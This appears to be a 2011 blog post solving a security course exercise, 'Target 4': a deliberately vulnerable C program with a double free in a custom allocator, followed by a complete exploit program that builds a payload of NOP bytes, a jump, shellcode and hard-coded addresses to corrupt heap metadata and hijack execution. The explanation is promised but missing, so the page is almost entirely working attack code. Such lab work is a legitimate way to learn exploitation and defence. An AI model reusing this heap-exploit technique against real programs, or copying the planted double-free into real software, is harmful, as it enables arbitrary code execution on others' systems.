Tuesday, March 22, 2011

Target 4

Explanation coming soon, I've been really busy, stay tuned!

//target4.c
#include 
#include 
#include 
#include 
#include "tmalloc.h"

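/*
 * strlcpy() from OpenBSD-current:
 * $OpenBSD: strlcpy.c,v 1.5 2001/05/13 15:40:16 deraadt Exp $
 *
 * Copy src to string dst of size siz.  At most siz-1 characters
 * will be copied.  Always NUL terminates (unless siz == 0).
 * Returns strlen(src); if retval >= siz, truncation occurred.
 *
 * dst: destination buffer holding at least siz bytes
 * src: NUL-terminated source string; read to its end even on truncation
 * siz: total size of dst, including the slot for the NUL
 *
 * Defined with a prototype (the original used an old-style parameter
 * list) so that an int argument, such as the literal 1024 passed by
 * foo(), is converted to size_t at the call instead of being passed
 * unconverted.
 *
 * HINT: This comes from OpenBSD; there is no buffer overflow within
 *       this function; the bug is somewhere else ...
 */
static size_t
obsd_strlcpy(char *dst, const char *src, size_t siz)
{
        char *d = dst;
        const char *s = src;
        size_t n = siz;

        /* Copy as many bytes as will fit, keeping one slot for the NUL */
        if (n != 0 && --n != 0) {
                do {
                        if ((*d++ = *s++) == '\0')
                                break;  /* whole string copied; n stays non-zero */
                } while (--n != 0);
        }

        /* Not enough room in dst, add NUL and traverse rest of src */
        if (n == 0) {
                if (siz != 0)
                        *d = '\0';              /* NUL-terminate dst */
                while (*s++ != '\0')
                        ;
        }

        /* On both paths s now points one past src's terminating NUL */
        return (size_t)(s - src - 1);   /* count does not include NUL */
}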



/*
 * Copy the caller-supplied string into a 1024-byte tmalloc() buffer.
 *
 * arg: NUL-terminated string; main() passes argv[1] unchanged.
 * Returns 0; exits the process if any tmalloc() call returns NULL.
 *
 * This function carries the exercise's defect: q is handed to tfree()
 * twice (see the notes below).  tmalloc()/tfree() come from tmalloc.h,
 * which is not shown on this page.
 */
int foo(char *arg)
{
  char *p;
  char *q;

  /* Two allocations of 500 and 300 bytes, made back to back. */
  if ( (p = tmalloc(500)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    }
  if ( (q = tmalloc(300)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    } 

  /* Both blocks are released here.  q is not reset, so from this point
   * on it is a dangling pointer. */
  tfree(p);
  tfree(q);
  
  /* Only p is reassigned.
   * NOTE(review): whether this 1024-byte block overlaps the memory q
   * still points at depends on tmalloc's reuse policy - confirm against
   * tmalloc.c. */
  if ( (p = tmalloc(1024)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    }

  /* Bounded copy: at most 1023 bytes plus a NUL are written, so the copy
   * itself stays inside p's 1024 bytes. */
  obsd_strlcpy(p, arg, 1024);

  /* DEFECT: second tfree(q) with no allocation assigned to q in between
   * (double free of a stale pointer).  If the block above overlaps q's
   * old chunk, the allocator would be working on bookkeeping bytes that
   * were just filled from arg - presumably the intended flaw.
   * The fix is to free p here instead, and to set pointers to NULL right
   * after freeing them.  As written, p is never released before return. */
  tfree(q);

  return 0;
}

/*
 * Entry point of target4: requires exactly one command-line argument and
 * passes it to foo() unchanged.  Any other argument count prints a
 * diagnostic to stderr and exits with EXIT_FAILURE.
 */
int main(int argc, char *argv[])
{
  if (argc == 2)
    {
      /* argv[1] is untrusted input; foo()'s return value is not used */
      foo(argv[1]);
      return 0;
    }

  fprintf(stderr, "target4: argc != 2\n");
  exit(EXIT_FAILURE);
}


//sploit4.c
#include 
#include 
#include 
#include 
#include "shellcode.h"

#define TARGET "/tmp/target4"

/*
 * Build a fixed 1024-byte argument string and exec TARGET with it as
 * argv[1] and an empty environment.
 *
 * The buffer layout produced by the loop below is:
 *   [0,2)       0x90 bytes
 *   [2,4)       the two bytes "\xeb\x03"
 *   [4,8)       the value of `fake`, low byte first
 *   [8,504-L)   0x90 bytes, where L = strlen(shellcode)
 *   [504-L,504) the bytes of `shellcode` (from shellcode.h, not shown)
 *   [504,508)   the value of `left`, low byte first
 *   [508,512)   the value of `right`, low byte first
 *   [512,1023)  0x90 bytes
 *   [1023]      NUL terminator
 *
 * NOTE(review): `left` and `right` are hard-coded absolute addresses; the
 * page does not say what they refer to.  They can only be meaningful for
 * one specific build and memory layout of the target, which is why
 * address-space randomization and allocator integrity checks are the
 * usual mitigations for this class of bug.
 */
int main(void)
{
 
  char *args[3];
  char *env[1];
  char buf[1024];
  int i;
  int fake, left, right;


/* 0xbffffa8c does not fit in a 32-bit int, so the conversion to `right`
 * is implementation-defined (typically a negative value). */
left = 0x08049bc8;
right = 0xbffffa8c;
/* fake differs from right only by +1 */
fake = right + 1;

/* Each branch stores one byte at buf[i], except the "\xeb\x03" branch,
 * which stores two bytes and advances i an extra step.  The shifts store
 * one byte of the int per iteration (conversion to char keeps the low 8
 * bits); >> on a negative int is implementation-defined, but only those
 * low 8 bits are used.  In `i < (504 - strlen(shellcode))` i is compared
 * as an unsigned value, which assumes strlen(shellcode) < 504. */
for (i = 0; i< 1024; i++){
  if(i < 2) {*(buf + i) = '\x90';} 
   else if (i < 4) 
    {
    memcpy((buf + i), "\xeb\x03", 2);
    i++;
    } 
    else if (i < 8) {*(buf + i) = fake >>(( i-4 ) * 8);} 
    else if (i < (504 - strlen(shellcode))){*(buf+i) = '\x90';} 
    else if (i < 504) {*(buf+i) = shellcode[i - 504 + strlen(shellcode)];} 
    else if (i < 508) {*(buf + i) = left >> ((i - 504) * 8);} 
    else if (i < 512) {*(buf + i) = right >> ((i - 508) * 8);} 
    else if (i < 1023) {*(buf + i) = '\x90';} 
    else {*(buf + i) = '\x00';}
    }

  /* argv = { TARGET, buf, NULL }; envp = { NULL } (empty environment) */
  args[0] = TARGET; args[1] = buf; args[2] = NULL;
  env[0] = NULL;

  /* execve() returns only on failure */
  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}
